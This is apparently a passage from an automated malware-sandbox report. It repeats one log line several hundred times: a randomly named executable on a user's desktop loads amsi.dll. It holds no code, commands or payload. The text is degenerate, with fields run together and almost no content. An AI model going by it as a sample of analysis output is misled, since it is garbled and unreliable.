      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
